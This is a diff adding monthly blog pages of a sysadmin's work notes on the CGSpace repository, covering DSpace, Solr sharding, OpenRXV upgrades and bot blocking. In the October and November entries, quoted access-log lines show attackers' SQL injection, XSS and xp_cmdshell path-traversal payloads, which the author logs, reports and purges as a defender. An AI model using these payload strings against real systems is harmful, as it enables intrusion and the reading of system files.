+<li>Someone in the DSpace community already posted a fix for the DSpace 6/7 duplicate items export bug!
+<ul>
+<li>I tested it and it works so I left feedback: <a href="https://github.com/DSpace/DSpace/pull/7995">https://github.com/DSpace/DSpace/pull/7995</a></li>
+</ul>
+</li>
+<li>Altmetric support got back to us about the missing DOI–Handle link and said it was due to the TLS certificate chain on CGSpace
+<ul>
+<li>I checked and everything is actually working fine, so it could be their backend servers are old and don&rsquo;t support the new Let&rsquo;s Encrypt trust path</li>
+<li>I asked them to put me in touch with their backend developers directly</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-17">2021-10-17</h2>
+<ul>
+<li>Revert the ssl-cert change on the Ansible infrastructure scripts so that nginx uses a manually generated &ldquo;snakeoil&rdquo; TLS certificate
+<ul>
+<li>The ssl-cert one is easier because it&rsquo;s automatic, but they include the hostname in the bogus cert so it&rsquo;s an unecessary leak of information</li>
+</ul>
+</li>
+<li>I started doing some tests to upgrade Elasticsearch from 7.6.2 to 7.7, 7.8, 7.9, and eventually 7.10 on OpenRXV
+<ul>
+<li>I tested harvesting, reporting, filtering, and various admin actions with each version and they all worked fine, with no errors in any logs as far as I can see</li>
+<li>This fixes bunches of issues, updates Java from 13 to 15, and the base image from CentOS 7 to 8, so it&rsquo;s a decent amount of technical debt!</li>
+<li>I even tried Elasticsearch 7.13.2, which has Java 16, and it works fine&hellip;</li>
+<li>I submitted a pull request: <a href="https://github.com/ilri/OpenRXV/pull/126">https://github.com/ilri/OpenRXV/pull/126</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-20">2021-10-20</h2>
+<ul>
+<li>Meeting with Big Data and CGIAR repository players about the feasibility of moving to a single repository
+<ul>
+<li>We discussed several options, for example moving all DSpaces to CGSpace along with their permanent identifiers</li>
+<li>The issue would be for centers like IFPRI who don&rsquo;t use DSpace and have integrations with their website etc with their current repository</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-21">2021-10-21</h2>
+<ul>
+<li>Udana from IWMI contacted me to ask if I could do a one-off AReS harvest because they have some new items they need to report on</li>
+</ul>
+<h2 id="2021-10-22">2021-10-22</h2>
+<ul>
+<li>Abenet and others contacted me to say that the LDAP login was not working on CGSpace
+<ul>
+<li>I checked with <code>ldapsearch</code> and it is indeed not working:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;booo&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=fuuu)&#34;</span>
+</span></span><span style="display:flex;"><span>Enter LDAP Password:
+</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
+</span></span><span style="display:flex;"><span>        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
+</span></span></code></pre></div><ul>
+<li>I sent a message to ILRI ICT to ask them to check the account
+<ul>
+<li>They reset the password so I ran all system updates and rebooted the server since users weren&rsquo;t able to log in anyways</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-24">2021-10-24</h2>
+<ul>
+<li>CIP was asking about CGSpace stats again
+<ul>
+<li>The last time I helped them with this was in 2021-04, when I extracted stats for their community from the DSpace Statistics API</li>
+</ul>
+</li>
+<li>In looking at the CIP stats request I got curious if there were any hits from all those Russian IPs before 2021-07 that I could purge
+<ul>
+<li>Sure enough there were a few hundred IPs belonging to those ASNs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ http <span style="color:#e6db74">&#39;localhost:8081/solr/statistics/select?q=time%3A2021-04*&amp;fl=ip&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&amp;facet.limit=200000&amp;facet.mincount=1&#39;</span> &gt; /tmp/2021-04-ips.json
+</span></span><span style="display:flex;"><span># Ghetto way to extract the IPs using jq, but I can<span style="color:#960050;background-color:#1e0010">&#39;</span>t figure out how only print them and not the facet counts, so I just use sed
+</span></span><span style="display:flex;"><span>$ jq <span style="color:#e6db74">&#39;.facet_counts.facet_fields.ip[]&#39;</span> /tmp/2021-04-ips.json | grep -E <span style="color:#e6db74">&#39;^&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> &gt; /tmp/ips.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u &gt; /tmp/networks-to-block.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/networks-to-block.txt 
+</span></span><span style="display:flex;"><span>125 /tmp/networks-to-block.txt
+</span></span><span style="display:flex;"><span>$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt &gt; /tmp/ips-to-purge.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/ips-to-purge.txt
+</span></span><span style="display:flex;"><span>202
+</span></span></code></pre></div><ul>
+<li>Attempting to purge those only shows about 3,500 hits, but I will do it anyways
+<ul>
+<li>Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged</li>
+</ul>
+</li>
+<li>I also purged another 5306 hits after checking the IPv4 list from AbuseIPDB.com</li>
+</ul>
+<h2 id="2021-10-25">2021-10-25</h2>
+<ul>
+<li>Help CIP colleagues with view and download statistics for their community in 2020 and 2021</li>
+</ul>
+<h2 id="2021-10-27">2021-10-27</h2>
+<ul>
+<li>Help ICARDA colleagues with GLDC reports on AReS
+<ul>
+<li>There was an issue due to differences in CRP metadata between repositories</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-28">2021-10-28</h2>
+<ul>
+<li>Meeting with Medha and a bunch of others about the FAIRscribe tool they have been developing
+<ul>
+<li>Seems it is a submission tool like MEL</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-29">2021-10-29</h2>
+<ul>
+<li>Linode alerted me that CGSpace (linode18) has high outbound traffic for the last two hours
+<ul>
+<li>This has happened a few other times this week so I decided to go look at the Solr stats for today</li>
+<li>I see 93.158.91.62 is making thousands of requests to Discover with a normal user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+</code></pre><ul>
+<li>Even more annoying, they are not re-using their session ID:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>4888
+</span></span></code></pre></div><ul>
+<li>This IP has made 36,000 requests to CGSpace&hellip;</li>
+<li>The IP is owned by <a href="internetvikings.com">Internet Vikings</a> in Sweden</li>
+<li>I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent</li>
+<li>I see another one in Sweden a few days ago (192.36.109.131), also using the same exact user agent as above, but belonging to <a href="http://webb.resilans.se/">Resilans AB</a>
+<ul>
+<li>I purged another 74,619 hits from this bot</li>
+</ul>
+</li>
+<li>I added these two IPs to the nginx IP bot identifier</li>
+<li>Jesus I found a few Russian IPs attempting SQL injection and path traversal, ie:</li>
+</ul>
+<pre tabindex="0"><code>45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] &#34;GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&amp;OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1&#34; 200 143070 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11&#34;
+</code></pre><ul>
+<li>I reported them to AbuseIPDB.com and purged their hits:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
+</span></span><span style="display:flex;"><span>Purging 6364 hits from 45.9.20.71 in statistics
+</span></span><span style="display:flex;"><span>Purging 8039 hits from 45.146.166.157 in statistics
+</span></span><span style="display:flex;"><span>Purging 3383 hits from 45.155.204.82 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 17786
+</span></span></code></pre></div><h2 id="2021-10-31">2021-10-31</h2>
+<ul>
+<li>Update Docker containers for AReS on linode20 and run a fresh harvest</li>
+<li>Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent &ldquo;Microsoft Internet Explorer&rdquo;
+<ul>
+<li>It is in Greece, and it seems to be requesting each item&rsquo;s XMLUI full metadata view, so I suspect it&rsquo;s Gardian actually</li>
+<li>I found it making another 25,000 requests yesterday&hellip;</li>
+<li>I purged them from Solr</li>
+</ul>
+</li>
+<li>Found 20,000 hits from Qualys (according to AbuseIPDB.com) using normal user agents&hellip; ugh, must be some ILRI ICT scan</li>
+<li>Found more request from a Swedish IP (93.158.90.34) using that weird Firefox user agent that I noticed a few weeks ago:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
+</code></pre><ul>
+<li>That&rsquo;s from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it&rsquo;s <a href="availo.se">Availo Networks AB</a></li>
+<li>There&rsquo;s another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it&rsquo;s using a normal user agent</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
+</span></span><span style="display:flex;"><span>3991
+</span></span><span style="display:flex;"><span>~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE &#39;GET /rest/(collections|handle|items)&#39; | sort | uniq -c
+</span></span><span style="display:flex;"><span>   3154 GET /rest/collections
+</span></span><span style="display:flex;"><span>    427 GET /rest/handle
+</span></span><span style="display:flex;"><span>    410 GET /rest/items
+</span></span></code></pre></div><ul>
+<li>It requested the <a href="https://cgspace.cgiar.org/handle/10568/75560">CIAT Story Maps</a> collection over 3,000 times last month&hellip;
+<ul>
+<li>I will purge those hits</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-11/index.html b/docs/2021-11/index.html
new file mode 100644
index 000000000..9963d3e28
--- /dev/null
+++ b/docs/2021-11/index.html
@@ -0,0 +1,548 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2021" />
+<meta property="og:description" content="2021-11-02
+
+I experimented with manually sharding the Solr statistics on DSpace Test
+First I exported all the 2019 stats from CGSpace:
+
+$ ./run.sh -s http://localhost:8081/solr/statistics -f &#39;time:2019-*&#39; -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-11/" />
+<meta property="article:published_time" content="2021-11-02T22:27:07+02:00" />
+<meta property="article:modified_time" content="2021-11-30T16:44:30+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2021"/>
+<meta name="twitter:description" content="2021-11-02
+
+I experimented with manually sharding the Solr statistics on DSpace Test
+First I exported all the 2019 stats from CGSpace:
+
+$ ./run.sh -s http://localhost:8081/solr/statistics -f &#39;time:2019-*&#39; -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-11/",
+  "wordCount": "2080",
+  "datePublished": "2021-11-02T22:27:07+02:00",
+  "dateModified": "2021-11-30T16:44:30+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-11/">
+
+    <title>November, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-11/">November, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-11-02T22:27:07+02:00">Tue Nov 02, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-11-02">2021-11-02</h2>
+<ul>
+<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
+<li>First I exported all the 2019 stats from CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
+</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
+</span></span></code></pre></div><ul>
+<li>Then on DSpace Test I created a <code>statistics-2019</code> core with the same instance dir as the main <code>statistics</code> core (as <a href="https://wiki.lyrasis.org/display/DSDOC6x/Testing+Solr+Shards">illustrated in the DSpace docs</a>)</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
+</span></span><span style="display:flex;"><span># create core in Solr admin
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;time:2019-*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
+</span></span></code></pre></div><ul>
+<li>The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system</li>
+<li>I restarted the server after the import was done to see if the cores would come back up OK
+<ul>
+<li>I remember last time I tried this the manually created statistics cores didn&rsquo;t come back up after I rebooted, but this time they did</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-03">2021-11-03</h2>
+<ul>
+<li>While inspecting the stats for the new statistics-2019 shard on DSpace Test I noticed that I can&rsquo;t find any stats via the DSpace Statistics API for an item that <em>should</em> have some
+<ul>
+<li>I checked on CGSpace&rsquo;s and I can&rsquo;t find them there either, but I see them in Solr when I query in the admin UI</li>
+<li>I need to debug that, but it doesn&rsquo;t seem to be related to the sharding&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-04">2021-11-04</h2>
+<ul>
+<li>I spent a little bit of time debugging the Solr bug with the statistics-2019 shard but couldn&rsquo;t reproduce it for the few items I tested
+<ul>
+<li>So that&rsquo;s good, it seems the sharding worked</li>
+</ul>
+</li>
+<li>Linode alerted me to high CPU usage on CGSpace (linode18) yesterday
+<ul>
+<li>Looking at the Solr hits from yesterday I see 91.213.50.11 making 2,300 requests</li>
+<li>According to AbuseIPDB.com this is owned by Registrarus LLC (registrarus.ru) and it has been reported for malicious activity by several users</li>
+<li>The ASN is 50340 (SELECTEL-MSK, RU)</li>
+<li>They are attempting SQL injection:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] &#34;HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&amp;isAllowed=y HTTP/1.1&#34; 200 0 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10&#34;
+</span></span></code></pre></div><ul>
+<li>Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
+</span></span><span style="display:flex;"><span>1178
+</span></span></code></pre></div><ul>
+<li>I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
+<ul>
+<li>Today I did all 2018 stats&hellip;</li>
+<li>I want to see if there is a noticeable change in JVM memory, Solr response time, etc</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-07">2021-11-07</h2>
+<ul>
+<li>Update all Docker containers on AReS and rebuild OpenRXV:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose build
+</span></span></code></pre></div><ul>
+<li>Then restart the server and start a fresh harvest</li>
+<li>Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)</li>
+<li>Several users wrote to me last week to say that workflow emails haven&rsquo;t been working since 2021-10-21 or so
+<ul>
+<li>I did a test on CGSpace and it&rsquo;s indeed broken:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
+</span></span><span style="display:flex;"><span> - To: fuuuu
+</span></span><span style="display:flex;"><span> - Subject: DSpace test email
+</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
+</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
+</span></span><span style="display:flex;"><span>)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
+</span></span></code></pre></div><ul>
+<li>I sent a message to ILRI ICT to ask them to check the account/password</li>
+<li>I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
+</span></span></code></pre></div><ul>
+<li>Then on my local server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
+</span></span><span style="display:flex;"><span>$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span>
+</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod <span style="color:#ae81ff">660</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
+</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod <span style="color:#ae81ff">770</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
+</span></span><span style="display:flex;"><span># copy backend/data to /tmp <span style="color:#66d9ef">for</span> the repository setup/layout
+</span></span><span style="display:flex;"><span>$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
+</span></span></code></pre></div><ul>
+<li>This seems to work: all items, stats, and repository setup/layout are OK</li>
+<li>I merged my <a href="https://github.com/ilri/OpenRXV/pull/126">Elasticsearch pull request</a> from last month into OpenRXV</li>
+</ul>
+<h2 id="2021-11-08">2021-11-08</h2>
+<ul>
+<li>File <a href="https://github.com/DSpace/dspace-angular/issues/1391">an issue for the Angular flash of unstyled content</a> on DSpace 7</li>
+<li>Help Udana from IWMI with a question about CGSpace statistics
+<ul>
+<li>He found conflicting numbers when using the community and collection modes in Content and Usage Analysis</li>
+<li>I sent him more numbers directly from the DSpace Statistics API</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-09">2021-11-09</h2>
+<ul>
+<li>I migrated the 2013, 2012, and 2011 statistics to yearly shards on DSpace Test&rsquo;s Solr to continute my testing of memory / latency impact</li>
+<li>I found out why the CI jobs for the DSpace Statistics API had been failing the past few weeks
+<ul>
+<li>When I reverted to using the original falcon-swagger-ui project after they apparently merged my Falcon 3 changes, it seems that they actually only merged the Swagger UI changes, not the Falcon 3 fix!</li>
+<li>I switched back to using my own fork and now it&rsquo;s working</li>
+<li>Unfortunately now I&rsquo;m getting an error installing my dependencies with Poetry:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>RuntimeError
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Unable to find installation candidates for regex (2021.11.9)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
+</span></span><span style="display:flex;"><span>     68│
+</span></span><span style="display:flex;"><span>     69│             links.append(link)
+</span></span><span style="display:flex;"><span>     70│
+</span></span><span style="display:flex;"><span>     71│         if not links:
+</span></span><span style="display:flex;"><span>  →  72│             raise RuntimeError(
+</span></span><span style="display:flex;"><span>     73│                 &#34;Unable to find installation candidates for {}&#34;.format(package)
+</span></span><span style="display:flex;"><span>     74│             )
+</span></span><span style="display:flex;"><span>     75│
+</span></span><span style="display:flex;"><span>     76│         # Get the best link
+</span></span></code></pre></div><ul>
+<li>So that&rsquo;s super annoying&hellip; I&rsquo;m going to try using Pipenv again&hellip;</li>
+</ul>
+<h2 id="2021-11-10">2021-11-10</h2>
+<ul>
+<li>93.158.91.62 is scraping us again
+<ul>
+<li>That&rsquo;s an IP in Sweden that is clearly a bot, but pretending to use a normal user agent</li>
+<li>I added them to the &ldquo;bot&rdquo; list in nginx so the requests will share a common DSpace session with other bots and not create Solr hits, but still they are causing high outbound traffic</li>
+<li>I modified the nginx configuration to send them an HTTP 403 and tell them to use a bot user agent</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-14">2021-11-14</h2>
+<ul>
+<li>I decided to update AReS to the latest OpenRXV version with Elasticsearch 7.13
+<ul>
+<li>First I took backups of the Elasticsearch volume and OpenRXV backend data:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose down
+</span></span><span style="display:flex;"><span>$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
+</span></span><span style="display:flex;"><span>$ cp -a backend/data backend/data.2021-11-14
+</span></span></code></pre></div><ul>
+<li>Then I checked out the latest git commit, updated all images, rebuilt the project:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose build
+</span></span><span style="display:flex;"><span>$ docker-compose up -d
